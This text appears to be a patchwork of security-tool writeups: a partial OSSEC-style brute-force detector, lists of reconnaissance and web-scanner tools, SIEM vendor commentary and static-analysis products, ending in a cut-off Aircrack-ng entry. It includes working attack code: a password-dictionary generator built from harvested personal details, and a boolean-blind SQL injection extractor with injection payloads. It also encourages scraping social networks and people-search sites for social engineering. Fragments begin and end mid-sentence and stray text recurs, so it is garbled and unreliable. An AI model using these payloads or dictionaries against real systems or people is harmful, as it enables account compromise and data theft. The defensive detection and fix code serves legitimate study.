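Jun  1 10:00:20 web1 sshd[2106]: Accepted password for alice from 198.51.100.9 port 40002 ssh2
Jun  1 10:05:30 web1 sshd[2107]: Failed password for root from 203.0.113.7 port 51005 ssh2
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Hypothetical rule in the shape of OSSEC's <rule frequency="" timeframe="" level=""> element
RULE = {"id": 100010, "level": 10, "frequency": 4, "timeframe": 60,
        "description": "sshd: brute force attempt (multiple failed logins from one source)"}
ACTIVE_RESPONSE_LEVEL = 7   # alerts at or above this level trigger the response command

def parse_line(line: str, year: int = 2016):
    """Decode one sshd line; syslog lines carry no year, so it is supplied."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}

def analyze(log_text: str):
    """Return the alerts raised, each carrying the active-response command it would launch."""
    recent = defaultdict(deque)   # src -> timestamps of its failures inside the timeframe
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["result"] != "Failed":
            continue
        q = recent[ev["src"]]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > RULE["timeframe"]:
            q.popleft()                            # slide the window forward
        if len(q) >= RULE["frequency"]:
            alert = {"rule": RULE["id"], "level": RULE["level"], "src": ev["src"],
                     "at": ev["ts"], "description": RULE["description"]}
            if RULE["level"] >= ACTIVE_RESPONSE_LEVEL:
                # OSSEC passes (action, user, srcip) to the configured script; shown as a string, never run
                alert["active_response"] = f"firewall-drop.sh add - {ev['src']}"
            alerts.append(alert)
            q.clear()                              # do not re-fire on the same burst
    return alerts

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a)
```

Only the four failures inside the 60-second window produce an alert; the single failure five minutes later starts a fresh window and stays quiet, and the successful login is never counted. Clearing the window after firing is what stops one burst from producing a page for every additional attempt.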
OSSIM
AlienVault OSSIM (Open Source Security Information Management) aims to provide a comprehensive compilation of tools which, working together, give network and security administrators a detailed view of every aspect of their networks, hosts, physical access devices and servers. OSSIM incorporates several other tools, including Nagios and OSSEC HIDS.
Latest release: version 5.0.3 on June 2, 2015.
Sguil
Sguil (pronounced "sgweel") is built by network security analysts for network security analysts. Its main component is an intuitive GUI that provides access to real-time events, session data and raw packet captures. Sguil facilitates the practice of network security monitoring and event-driven analysis.
Latest release: version 0.9.0 on March 28, 2014.
Honeyd
Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their TCP personality can be adapted so that they appear to be running particular operating system versions. Honeyd enables a single host to claim multiple addresses on a LAN for network simulation. It is possible to ping the virtual hosts or to traceroute to them. Any type of service on a virtual host can be simulated according to a simple configuration file, and services can also be proxied to another machine rather than simulated. Honeyd has many library dependencies, which can make compiling and installing it difficult.
Latest release: version 1.5c on May 27, 2007.
INFORMATION GATHERING TOOLS:
There are more than 20 tools that I use for information gathering, as it is the most important phase of any attack, and it is always good to gather as much information as you can. Few people are aware that the information collected in this phase is used to build dictionary files for brute-force attacks and to support social engineering attacks. Some of my favourite information gathering tools are:
a. Google (best for passive information gathering): use Google dorks to their full potential. You can find thousands of such dorks on the exploit-db.com website.
b. Facebook, Google+, LinkedIn and other social networking sites are great places to gather personal information about anyone.
c. Nothing beats Netcraft for passive information gathering about web servers.
d. Whois is always informative and is still considered the best tool for passive information gathering about domains.
e. HTTrack and WebRipper are also good tools for making an offline copy of a website, so that attacks which cannot be run against the live server can be executed locally, since most servers now use extensive protections.
f. Wireshark: for anything related to network sniffing or capturing network data, no single tool beats Wireshark.
g. A few other favourite tools for information gathering are DNSDICT, DNSRecon and DNSEnum.
h. Spokeo: a people search engine where you can search for people by name, email address and phone number.
There are many more tools you can use for information gathering.
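The claim at the top of this section, that reconnaissance output feeds dictionary attacks, is easy to see in code. The following is an added example, not the author's code or any tool listed here: a profile of constructed facts (names, pet, employer, keyword, years, the sort of thing a social-network and whois sweep yields) is expanded with the usual mutations of profile-based generators such as CUPP, written from scratch. The profile, the leet table and the symbol set are all assumptions chosen for illustration.

```python
"""Build a brute-force dictionary from facts gathered during reconnaissance (added example)."""
import itertools

# Constructed target profile
PROFILE = {
    "names": ["alice", "smith"],
    "pets": ["rex"],
    "company": ["acme"],
    "keywords": ["sunrise"],
    "years": ["1984", "2016"],
}
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SPECIALS = ["!", "@", "#"]

def base_tokens(profile):
    """Flatten every non-year field into distinct lowercase words, keeping first-seen order."""
    seen = []
    for key, values in profile.items():
        if key == "years":
            continue
        for v in values:
            v = v.lower()
            if v not in seen:
                seen.append(v)
    return seen

def mutate(word):
    """Case and leet variants of one word (the leet form only if it changes something)."""
    yield word
    yield word.capitalize()
    yield word.upper()
    leet = word.translate(LEET)
    if leet != word:
        yield leet

def generate(profile, min_len=6, max_len=16):
    """Return an ordered, de-duplicated candidate list within a length band."""
    tokens = base_tokens(profile)
    years = profile.get("years", [])
    suffixes = [""] + years + [y[-2:] for y in years]   # "", 1984, 2016, 84, 16
    out, seen = [], set()

    def add(candidate):
        if min_len <= len(candidate) <= max_len and candidate not in seen:
            seen.add(candidate)
            out.append(candidate)

    for word in tokens:
        for variant in mutate(word):
            for suffix in suffixes:
                add(variant + suffix)
                for sym in SPECIALS:
                    add(variant + suffix + sym)
    # Two-word joins such as name+pet or name+company, plain and capitalised, with year suffixes
    for a, b in itertools.permutations(tokens, 2):
        for joined in (a + b, a.capitalize() + b.capitalize()):
            add(joined)
            for y in years:
                add(joined + y)
    return out

if __name__ == "__main__":
    words = generate(PROFILE)
    print(len(words), "candidates; first ten:", words[:10])
```

The length band matters: candidates shorter than the target's minimum password length are wasted requests in an online attack, so they are dropped at generation time rather than at the lock-out counter.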
Nmap
http://nmap.org/
P0f
http://lcamtuf.coredump.cx/p0f.shtml
MingSweeper
http://www.hoobie.net/mingsweeper/
THC Amap
http://freeworld.thc.org/thc-amap/
Angry IP Scanner
http://www.angryziber.com/w/Download
Unicornscan
http://sourceforge.net/projects/osace
Samspade
http://samspade.org/
Strobe
http://packetstormsecurity.org/UNIX/scanners/
Netcat
http://netcat.sourceforge.net/
Superscan
http://www.foundstone.com/us/resources/proddesc/superscan.htm
SQL Scan
http://www.foundstone.com/us/resources/proddesc/sqlscan.htm
ipEye
http://www.ntsecurity.nu/toolbox/ipeye/
Nuke Nabber
http://packetstormsecurity.org/MSDOS/audit/nn29b.exe
Snort
http://www.snort.org
Trout
http://www.foundstone.com/us/resources/proddesc/trout.htm
Hping2
http://www.hping.org/
XProbe2
http://www.sys-security.com/index.php?page=xprobe
EtherPeek (now known as OmniPeek)
http://www.wildpackets.com/
This is not a complete list, and you are welcome to contribute to it: any new information gathering tools are welcome, so please leave a comment.
Once the scan is complete you'll find a separate report for each Windows machine scanned, with an overall security classification and categorized details of the results. For each item you can click a link to read details on what was scanned and, if a vulnerability was found, how to correct it; for some items you can click to see more result details. The reports are automatically saved for future reference, but you can also print them or copy them to the clipboard.
Although free and user-friendly, keep in mind that MBSA does not scan advanced Windows settings, drivers, non-Microsoft software or network-specific vulnerabilities. Nevertheless, it's a great tool to help you find and minimize general security risks.
Grabber
Grabber is a nice web application scanner which can detect many security vulnerabilities in web applications. It performs scans and reports where each vulnerability exists. It covers, among other things:
SQL injection
Ajax testing
File inclusion
It is slow compared with other security scanners, but it is simple and portable. It should only be used to test small web applications, because scanning large applications takes too much time. The tool has no GUI and cannot produce PDF reports. It was designed to be simple and for personal use; I would not recommend it for professional use.
The tool is written in Python, and an executable version is also available. The source code is available, so you can modify it to your needs. The main script is grabber.py, which once executed calls other modules such as sql.py and xss.py.
Download it here: http://rgaucher.info/beta/grabber/
Source code on Github: https://github.com/neuroo/grabber
Vega
Vega is another free, open source web vulnerability scanner and testing platform for security testing of web applications. It is written in Java, offers a GUI-based environment, and is available for OS X, Linux and Windows.
It can be used to find SQL injection, header injection, directory listing, shell injection, cross-site scripting, file inclusion and other web application vulnerabilities. The tool can also be extended through a powerful API written in JavaScript.
While working with the tool, it lets you set a few preferences such as the total number of path descendants, the number of child paths of a node, the crawl depth and the maximum number of requests per second. You can use the Vega Scanner, Vega Proxy, Proxy Scanner, and the scanner with credentials. If you need help, you can find resources in the documentation section:
Documentation: https://subgraph.com/vega/documentation/index.en.html
Download Vega: https://subgraph.com/vega/
OWASP ZAP
Intercepting Proxy
Automatic Scanner
Fuzzer
Plug-n-hack support
Authentication support
You can either use this tool as a scanner, by entering the URL to scan, or as an intercepting proxy to test specific pages manually.
Download ZAP : http://code.google.com/p/zaproxy/
Wapiti
Wapiti is another nice web vulnerability scanner that lets you audit the security of your web applications. It performs black-box testing by crawling web pages and injecting data: it tries payloads and checks whether a script is vulnerable. It supports both GET and POST HTTP attacks and detects multiple vulnerabilities, including:
File disclosure
File inclusion
CRLF injection
Wapiti is a command-line application, so it may not be easy for beginners, but it performs well for experts. To use it you need to learn a number of commands and options, which are covered in the official documentation.
Download Wapiti with source code: http://wapiti.sourceforge.net/
W3af
W3af is a popular web application attack and audit framework that aims to provide a better web application penetration testing platform. It is developed in Python. Using this tool, you can identify more than 200 kinds of web application vulnerabilities, including SQL injection, cross-site scripting and many others.
It comes with both a graphical and a console interface, and its interface is easy to understand.
With the graphical interface you are unlikely to run into any problems: select the options and start the scanner. If a website needs authentication, you can use the authentication modules to scan session-protected pages.
We have already covered this tool in detail in our previous W3af walkthrough series; you can read those articles to learn more about it.
You can access the source code at the GitHub repository: https://github.com/andresriancho/w3af/
Download it from the official website: http://w3af.org/
WebScarab
WebScarab is a Java-based security framework for analyzing web applications that use HTTP or HTTPS. Its functionality can be extended with the available plugins. The tool works as an intercepting proxy, so you can review the requests and responses passing between your browser and the server, and modify a request or response before it reaches the server or the browser.
If you are a beginner, this tool is not for you. It was designed for those who have a good understanding of the HTTP protocol and can write code.
WebScarab provides many features that help penetration testers work closely on a web application and find security vulnerabilities. It has a spider that can automatically find new URLs on the target website, and it can easily extract the scripts and HTML of a page. The proxy observes the traffic between the server and your browser, and you can take control of the request and response using the available plugins. The available modules can detect most common vulnerabilities, such as SQL injection, XSS, CRLF injection and many others.
Source code of the tool is available on Github: https://github.com/OWASP/OWASP-WebScarab
Download WebScarab
here:https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Skipfish
Skipfish is another nice web application security tool. It crawls the website, checks each page for various security issues, and at the end prepares a final report. The tool is written in C and is highly optimized for HTTP handling and minimal CPU use; it claims to handle 2000 requests per second easily without loading the CPU. It uses a heuristic approach while crawling and testing web pages, and also claims high-quality results with few false positives.
The tool is available for Linux, FreeBSD, Mac OS X and Windows.
Download Skipfish or its code from Google Code: http://code.google.com/p/skipfish/
Ratproxy
Ratproxy is another open source web application security audit tool that can be used to find security vulnerabilities in web applications. It supports Linux, FreeBSD, Mac OS X and Windows (Cygwin) environments.
The tool is designed to overcome the problems users usually face with other proxy tools during security audits. It is capable of distinguishing between CSS stylesheets and JavaScript code. It also supports SSL man-in-the-middle interception, which means you can also see data passing over SSL.
You can read more about this tool here:http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Download http://code.google.com/p/ratproxy/
SQLMap
SQLMap is another popular open source penetration testing tool. It automates the process of finding and exploiting SQL injection vulnerabilities in a website's database. It has a powerful detection engine and many useful features, so a penetration tester can easily perform SQL injection checks on a website.
It supports a range of database servers, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. It offers full support for six kinds of SQL injection technique: time-based blind, boolean-based blind, error-based, UNION query, stacked queries and out-of-band.
Access the source code on Github repository:https://github.com/sqlmapproject/sqlmap
Download SQLMap here: https://github.com/sqlmapproject/sqlmap
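Of the six techniques listed, boolean-based blind is the one that best shows why the tool is worth automating: the application leaks nothing but a yes/no difference, and the data still comes out. The following is an added example, not sqlmap's code: a deliberately vulnerable lookup on an in-memory SQLite database stands in for the target application, the extractor recovers a column value one bit at a time from that yes/no signal, and the parameterised lookup beside it is the fix. The table, rows and (truncated) hashes are constructed.

```python
"""Boolean-based blind SQL injection, the technique sqlmap automates, end to end (added example)."""
import sqlite3

DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
DB.executemany("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
               [("admin", "5f4dcc3b"), ("alice", "e99a18c4")])   # constructed, truncated hashes

QUERY_COUNT = {"n": 0}   # how many requests the extraction costs

def vulnerable_user_exists(username: str) -> bool:
    """The target: answers only yes/no, but builds SQL by string formatting (injectable on purpose)."""
    QUERY_COUNT["n"] += 1
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return DB.execute(sql).fetchone() is not None

def safe_user_exists(username: str) -> bool:
    """The fix: the value is bound as a parameter, so quotes inside it stay data."""
    return DB.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone() is not None

def oracle(condition: str) -> bool:
    """Turn the endpoint into a yes/no oracle for an arbitrary SQL condition.
    Injected value: admin' AND (<condition>) --   (the trailing comment swallows the closing quote)."""
    return vulnerable_user_exists(f"admin' AND ({condition}) -- ")

def extract(column: str, where: str, max_len: int = 64) -> str:
    """Recover a string with boolean-blind inference: length first, then 7 bit tests per character."""
    length = 0
    for n in range(1, max_len + 1):
        if oracle(f"(SELECT length({column}) FROM users WHERE {where}) = {n}"):
            length = n
            break
    chars = []
    for pos in range(1, length + 1):
        code = 0
        for bit in range(6, -1, -1):
            # SQLite: unicode() gives the code point; >> and & are integer operators
            test = (f"((SELECT unicode(substr({column}, {pos}, 1)) FROM users WHERE {where}) >> {bit}) & 1 = 1")
            if oracle(test):
                code |= 1 << bit
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    QUERY_COUNT["n"] = 0
    print("recovered:", extract("pw_hash", "username = 'admin'"), "in", QUERY_COUNT["n"], "requests")
    print("tautology against vulnerable endpoint:", vulnerable_user_exists("x' OR '1'='1"))
    print("tautology against safe endpoint:", safe_user_exists("x' OR '1'='1"))
```

Eight characters cost 64 requests here (8 to find the length, 7 per character); a real engine narrows the character set and batches tests to cut that down, which is exactly the optimisation sqlmap bundles. The parameterised version returns False for the tautology because the quote is part of the bound value, not of the statement.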
Wfuzz
Wfuzz is another freely available open source tool for web application penetration testing. It can be used to brute-force GET and POST parameters to test for various kinds of injection, such as SQL, XSS, LDAP and many others. It also supports cookie fuzzing, multi-threading, SOCKS and HTTP proxies, authentication, parameter brute forcing, multiple proxies and much more. You can read more about the tool's features here: http://code.google.com/p/wfuzz/
The tool has no GUI, so you will have to work from the command line.
Download Wfuzz from code.google.com: http://code.google.com/p/wfuzz/
Grendel-Scan
Grendel-Scan is another nice open source web application security tool. It is an automatic tool for finding security vulnerabilities in web applications, and many features are also available for manual penetration testing. The tool is written in Java and available for Windows, Linux and Macintosh.
Download the tool and source code: http://sourceforge.net/projects/grendel/
Watcher
Watcher is a passive web security scanner. It does not send floods of requests or crawl the target website. It is not a separate tool but an add-on for Fiddler, so you need to install Fiddler first and then install Watcher.
It quietly analyzes the requests and responses from your own interaction with the application and then produces a report on it. As a passive scanner, it does not affect the website's hosting or cloud infrastructure.
Download watcher and its source code: http://websecuritytool.codeplex.com/
X5S
X5S is also a Fiddler add-on, and it aims to help find cross-site scripting vulnerabilities. It is not an automatic tool, so you need to understand how encoding issues can lead to XSS: you find the injection point manually and then check where in the application the injected characters are reflected.
We have covered X5S in a previous post, so you can refer to that article to read more about X5S and XSS.
Download X5S and source code from codeplex: http://xss.codeplex.com/
You can also refer to this official guide to know how to use
X5S:http://xss.codeplex.com/wikipage?title=tutorial
Arachni
Arachni is an open source tool developed to provide a penetration testing environment. It can detect various web application security vulnerabilities, such as SQL injection, XSS, local file inclusion, remote file inclusion, unvalidated redirects and many others.
Download this tool here: http://www.arachni-scanner.com/
Final Word
These are the best open source web application security testing tools. I tried my best to list all the tools available online, but I did not mention tools that have not been updated for many years, because a tool more than 10 years old can create compatibility issues in a recent environment. If you are a developer, you can also join the developer community of these tools and help them grow; by helping these tools, you will also increase your own knowledge and expertise.
If you want to start penetration testing, I recommend using a Linux distribution created for penetration testing, such as BackTrack, GnackTrack, BackBox or Blackbuntu. All of these come with various free and open source tools for website penetration testing, so you can go with one of those environments.
If you think I forgot to mention an important tool, you can drop a comment and I will try to add it.
8 SIEM TOOLS:
"The best way to compare SIEM products is to fully understand what problem you are looking for them to solve," says Mav Turner, director of the security group at Austin-based SolarWinds Inc. "As fun as it is to play feature bingo and to let a vendor demonstrate the thousands of things a product can do, administrators should make sure they understand the few critical things they absolutely need the product to do. If the core use cases can't be quickly demonstrated, they should probably evaluate other products."
- Integration of traditional logs with other event sources, such as threat intelligence, Identity and Access Management (IAM) systems, Database Activity Monitoring (DAM), NetFlow/DPI, file integrity monitoring and application logging
- Aggregation and filtering at the collector level (with selectable fields and summarization of fields)
- Summarization tables
- Dropped/unparsable events
- Redundancy: how do I feed data in from a host through redundant parsers to redundant log management (compliance/1 year) data stores?
- Ability to forward the same log source from a single collection point to multiple destinations (primary log management, secondary log management, product correlation, development correlation)
- Role-based access controls: can the system be configured for Umpqua access to specific subsets of data/content with a mix of read and read/write/create permissions?
- management locally at each Umpqua, but master/global content pushed and synched from a managed services group, with local content not overridden but global content incorporated and overwritten?
- Inputs: how can we integrate with Governance, Risk and Compliance (GRC) and vulnerability management to provide a common dashboard?
customers, the larger and more established SIEM providers that also offer on-premises SIEM
generally assume the company also has experience with the technology, says Howie.
Howie noted that while the providers he has dealt with recognize that log data is the property of the
client, the clients need to understand that log data potentially can contain personally identifiable
information (PII) or protected health information (PHI). For example, the SIEM could alert on a file
transfer and collect the data from the transfer in a log file. That log file could contain a Social
Security Number or a patient's private data. He recommends that if the company collects protected
data, it should sign a Business Associate Agreement or a similar agreement with the cloud provider
to ensure the data is handled appropriately.
Unlike traditional, on-premises software, cloud-based SIEM generally is billed on a usage model
rather than per server or per user, Howie says. However, if the SIEM software sends all data logs to
the cloud or is otherwise improperly configured, the bandwidth cost from the cloud provider could be
very high and negate other cost efficiencies from the cloud.
"Continually tuning a SIEM as well as looking at the alerts can be a time-consuming task for skilled
professionals," says 451 Research senior security analyst Javvad Malik. "Smaller enterprises may
find greater benefits in utilizing a SaaS-based or managed security services provider (MSSP)
offering that will alleviate some of the ongoing demands."
"SIEMs as a product family set vary tremendously in deployment types, pricing structure, features
and the like. Some may be on-premises, others SaaS, some may charge per device, others by
number of events processed, some have features built into their own offering whilst others partner
with other vendors so comparing pricing and offerings is not a straightforward task," Malik adds.
Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act of
1996 (HIPAA), Federal Information Security Management Act of 2002 (FISMA), Sarbanes-Oxley Act
of 2002 (SOX) and other compliance standards. The software runs on VMware or Microsoft Hyper-V
virtual machines.
"Any SIEM can do log aggregation," Turner says. "This is a basic feature for a SIEM and often what
a lot of people are looking for in order to check a box for their auditor. Once they have the logs,
though, to get real value they need a solution that will also find problems and help sort through the
massive amounts of data quickly."
Users should see clear categories of activities so they can drill into the ones that are suspicious, he
adds. Event normalization is critical to a powerful SIEM and SolarWinds is starting to see the
emergence of threat intelligence feeds and integration of SIEMs with them. "While this is a great
addition," Turner notes, "it's critical to understand where the value is here and not get fooled into
thinking it equates to 'security in a box' by deploying solutions simply because they claim to have
that functionality."
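The two points made above, that event normalization is what makes a SIEM more than log aggregation and that a threat-intelligence feed is not "security in a box", can be shown on a handful of records. The following is an added example, not taken from any vendor's product: two constructed raw sources (a syslog firewall line and a JSON web-proxy record) are parsed into one common event schema, then each event is matched against a small indicator set standing in for a threat-intelligence feed. The field names of the common schema, the indicator values and the severity thresholds are all assumptions chosen for illustration.

```python
"""Event normalisation plus threat-intelligence enrichment (added example, not vendor code)."""
import json
import re
from datetime import datetime, timezone

# Constructed raw events (not real logs)
RAW_SYSLOG = ["<134>Jun  1 10:00:01 fw1 kernel: ACCEPT IN=eth0 OUT=eth1 SRC=10.0.0.5 DST=203.0.113.7 PROTO=TCP DPT=443",
              "<134>Jun  1 10:00:02 fw1 kernel: DROP IN=eth0 SRC=10.0.0.8 DST=192.0.2.44 PROTO=TCP DPT=23"]
RAW_PROXY = ['{"time":"2016-06-01T10:00:03Z","client":"10.0.0.6","dest_host":"updates.example.net","dest_ip":"198.51.100.9","action":"allowed","status":200}']

# Constructed indicator feed: value -> (indicator type, confidence 0-100, feed name)
THREAT_INTEL = {
    "203.0.113.7": ("ip", 90, "feed-A"),
    "192.0.2.44": ("ip", 95, "feed-A"),
    "updates.example.net": ("domain", 60, "feed-B"),
}

SYSLOG_RE = re.compile(r"^<\d+>(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>[\w\-]+): (?P<msg>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")

def normalize_syslog(line: str, year: int = 2016):
    """Netfilter-style firewall line -> common schema (None if the line does not parse)."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    kv = dict(KV_RE.findall(m["msg"]))
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
    return {"ts": ts, "source": "firewall", "reporter": m["host"], "src_ip": kv.get("SRC"),
            "dst_ip": kv.get("DST"), "dst_host": None,
            "action": "denied" if m["msg"].startswith("DROP") else "allowed"}

def normalize_proxy(record: str):
    """JSON proxy record -> the same common schema."""
    d = json.loads(record)
    ts = datetime.strptime(d["time"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "source": "proxy", "reporter": None, "src_ip": d["client"],
            "dst_ip": d["dest_ip"], "dst_host": d["dest_host"], "action": d["action"]}

def enrich(event: dict) -> dict:
    """Attach every matching indicator and derive a severity from confidence and outcome."""
    hits = []
    for key in ("dst_ip", "dst_host"):
        value = event.get(key)
        if value in THREAT_INTEL:
            ioc_type, confidence, feed = THREAT_INTEL[value]
            hits.append({"indicator": value, "type": ioc_type, "confidence": confidence, "feed": feed})
    event["ti_hits"] = hits
    if not hits:
        event["severity"] = "info"
    elif event["action"] == "allowed" and max(h["confidence"] for h in hits) >= 80:
        event["severity"] = "high"      # traffic actually reached a high-confidence indicator
    else:
        event["severity"] = "medium"    # blocked, or a low-confidence indicator: worth a look, not a page-out
    return event

def pipeline(syslog_lines, proxy_records):
    """Normalise both sources, order by time, enrich: one schema lets one rule cover both."""
    events = [e for e in map(normalize_syslog, syslog_lines) if e is not None]
    events += [normalize_proxy(r) for r in proxy_records]
    events.sort(key=lambda e: e["ts"])
    return [enrich(e) for e in events]

if __name__ == "__main__":
    for e in pipeline(RAW_SYSLOG, RAW_PROXY):
        print(e["ts"].isoformat(), e["source"], e["src_ip"], "->", e["dst_ip"], e["dst_host"], e["action"], e["severity"])
```

Two of the three events hit the feed at 90 or better, but only the connection the firewall accepted rates high: the blocked one is the control working, and the proxy hit on a 60-confidence domain is a lead, not an incident. That distinction is the context the feed itself cannot supply, and it only exists because both sources were first mapped to the same action and destination fields.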
"If a managed service provider is not an option, several SIEM vendors tailor to the SMB space by
offering solutions that are relatively less expensive and easier to manage when compared with their
full blown offerings," says Kent Saunders, a senior consultant at Accuvant.
These include:
- ArcSight Express for SIEM/correlation functionality and ArcSight Logger for log management;
- McAfee ESM (Enterprise Security Manager) appliance, which handles both SIEM/correlation and log management;
- IBM Security QRadar All-in-One appliance, which handles both SIEM/correlation and log management;
- Splunk Enterprise software or virtual machines for log management, with the ability for a user to write their own custom correlations and SIEM-like dashboards;
- LogRhythm's appliance, software and virtual machines, which handle both SIEM/correlation and log management.
Here's a more detailed look at HP's ArcSight, LogRhythm, SolarWinds, and Splunk.
ArcSight
Hewlett-Packard's ArcSight is primarily an enterprise-class SIEM offering, although it can scale down for smaller enterprises. The ArcSight Express rack-mount appliance includes a vast array of built-in capabilities. In addition to the log management capabilities that are the raison d'être of a SIEM, the appliance can collect, store and analyze all security data from a single interface. The software is capable of analyzing millions of security events from firewalls, intrusion prevention systems, endpoint devices and an array of other log- and data-producing devices. It boasts built-in security dashboards and audit reports that visualize threats and compliance, and is claimed to protect against zero-day attacks, advanced persistent threats, breach attempts, insider attacks, malware and unauthorized user access.
ArcSight Enterprise Security Manager (ESM) is targeted at large-scale security event management deployments. ArcSight Express "should be considered for midsize SIEM deployments (while) ESM is appropriate for larger deployments, as long as sufficient in-house support resources are available," according to Gartner.
ArcSight Logger can provide the log management tier in two-tier deployments. It also has optional modules for advanced user activity monitoring, identity and access management integration and fraud management. ArcSight pricing follows a more traditional software model and is more complex than that of SolarWinds or Splunk.
LogRhythm
LogRhythm All-In-One (XM) appliance and software is designed for midsized to large enterprises. It
includes a dedicated event manager, dedicated log manager, dedicated artificial intelligence engine,
site log forwarder and a network monitor. Each of the software components also is available in a
SolarWinds
SolarWinds' Log & Event Manager is targeted at the SMB market but can scale to larger businesses. The offering has prepackaged templates and an automated log management system. Among the features the company identifies as must-haves for a SIEM are the ability to collect data from network devices, machine data and cloud logs, as well as in-memory event correlation for real-time threat detection. Further must-haves are a flexible deployment option for scalable log collection and analysis, out-of-the-box reporting for security, compliance and operations, forensic analysis, and built-in active response for automated remediation.
Other features the company identifies as essential are internal data loss protection, embedded file integrity monitoring for threat detection and compliance support, and high compression and encryption for secure long-term archival and log management. SolarWinds uses node-based pricing.
Splunk
Like other SIEM products, the core of Splunk Enterprise monitors and manages application logs,
business process logs, configuration files, web access and web proxy logs, Syslog data, database
audit logs and tables, filesystem audit logs, and operating system metrics, status and diagnostic
commands. But at Splunk, the focus is on machine data -- the data generated by all of the systems
in the data center, the connected "internet of things," and other personal and corporate devices that
get connected to the corporate network.
Splunk offers three versions of its product:
- Splunk Free, which caps indexing at 500MB per day and has a limited feature set;
- Splunk Enterprise, for on-premises SIEM with all of the company's features;
- Splunk Cloud, which can scale up to multiple terabytes per day and offers the full feature set with the exception of the distributed management console and multi-site clustering (the clustering option is available on request for the cloud package).
Although the product has "enterprise" in its name, Splunk says the solution can be used by SMBs as
well and has been architected for use by non-SIEM experts. Non-SIEM engineers will be able to use
the event pattern detection, instant Pivot interface that enables users to discover relationships in
data without mastering the search language, and dashboards that can share pre-built panels that
integrate multiple charts and views over time.
Splunk Enterprise offers both a perpetual license that starts at $4,500 for 1 GB/day plus support and
a term license that starts at $1,800 per year and includes support.
1. How well does the platform handle the log sources? Will it work out of the box or will there be a lot of custom development work required?
2. What out-of-the-box reports are available for security and compliance?
12. Is there a desire for the product to have an operational role rather than be specific to security?
14. How does the product handle older data that has been archived off-box?
Additionally, here are some questions potential clients should ask that generally are not asked:
1. How many of the original product developers are still with the company?
2. What is your average first-contact time, as well as the time to resolution, for support tickets at each priority level?
3. How many full-time employees will I need for a deployment of this size?
4. How do you do log tiers: Log (Splunk Enterprise, ArcSight Logger, LogLogic) > SIEM (Splunk Enterprise Security, ArcSight, QRadar, McAfee ESM (Enterprise Security Manager)) > Automation (automatically run a script, open a ticket, take a VM snapshot, etc.) > Data (Hadoop storage)?
SIEM Overview
Some vendors combine SIEM with vulnerability management, file integrity monitoring, policy auditing and IPS as options. Other vendors integrate SIEM into their identity and access management solutions, and some provide SIEM as a point solution on its own.
SIEM as a product is a combination of security information management, security event management and network behaviour analysis tools, providing a complete view of log data and real-time events. Some companies only require one or the other (information management or event management): information management is used for historical and compliance purposes, and event management for real-time attack analysis. Some vendors also provide these as separate products.
Alert Logic is a cloud solutions vendor and offers a cloud-based incident and event log monitoring service.
GFI Software is a vendor focused on IT solutions for small and medium-sized businesses. GFI offers its centralised event log monitoring and management solution, GFI EventsManager.
IBM ISS has a SIEM product in Tivoli Security Information and Event Manager. IBM also has other log and event management solutions.
RSA is a well-known security vendor and a division of EMC. RSA is a market leader in two-factor authentication solutions, and its SIEM product, RSA enVision, is highly ranked.
may find lexical, syntactic and semantic defects. If you are relying too heavily on your
compiler to identify coding defects, you may find your code isn't maintainable or
transferable. Even code that compiles without warnings may have errors in how it
implements the requirements.
HP Fortify Software Static Code Analyzer helps developers identify software security
vulnerabilities in C, C++, Java, JSP, .NET, ASP.NET, classic Active Server Pages (ASP),
ColdFusion, PHP, Visual Basic 6, VBScript, JavaScript, PL/SQL, T-SQL, Python, Objective-C
and COBOL, as well as in configuration files.
IBM Rational AppScan Source Edition analyzes source code to identify security
vulnerabilities while integrating security testing with software development processes and
systems. It supports C, C++, .NET, Java, JSP, JavaScript, ColdFusion, Classic ASP, PHP, Perl,
Visual Basic 6, PL/SQL, T-SQL, and COBOL.
Black Duck Software Suite analyzes the composition of software source code and binary
files, searches for reusable code, manages open source and third-party code approval,
honors the legal obligations associated with mixed-origin code, and monitors related security
vulnerabilities.
Compuware Topaz for Program Analysis [1] is a static code analysis tool for PL/I and COBOL.
It produces visual displays of structure charts and logic/data flow and shows dependencies
across programs.
PENETRATION TESTING:
2. Aircrack-ng is a comprehensive set of network security tools that includes aircrack-ng
(which cracks WEP keys and runs WPA dictionary attacks), airdecap-ng (which decrypts WEP- or
WPA-encrypted capture files), airmon-ng (which places network cards into monitor mode, for
example when using the Alfa Security Scanner with the rtl8187), aireplay-ng (a packet
injector), airodump-ng (a packet sniffer), airtun-ng (which allows for virtual tunnel
interfaces), airolib-ng (which stores and manages ESSID and password lists), packetforge-ng
(which creates encrypted packets for injection), airbase-ng (which incorporates techniques
for attacking clients) and airdecloak-ng (which removes WEP cloaking). Other tools include
airdriver-ng (to manage wireless drivers), airolib-ng (to store and manage ESSID and password
